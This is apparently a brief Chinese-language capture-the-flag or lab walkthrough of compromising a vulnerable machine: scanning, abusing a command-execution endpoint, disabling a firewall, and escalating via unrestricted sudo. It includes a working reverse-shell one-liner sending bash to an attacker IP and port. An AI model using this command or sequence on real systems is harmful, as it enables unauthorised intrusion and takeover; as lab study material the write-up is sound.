主机发现,端口目录扫描
访问主页
尝试弱口令登录时,发现了一组账号密码,但并没有登录成功
访问扫描到的接口,提示输入 ls -l /tmp,并尝试查看其他目录,和其他系统命令
ps -aux发现有ssh但nmap却没有扫描到,原来在/etc有防火墙
关闭防火墙,并反弹shell,
ssh bill@localhost bash -i >& /dev/tcp/192.168.81.129/9999 0>&1
kali开启监听
普通用户,开始提权
提权
sudo -l,查看当前权限,显示all
sudo su 提权成功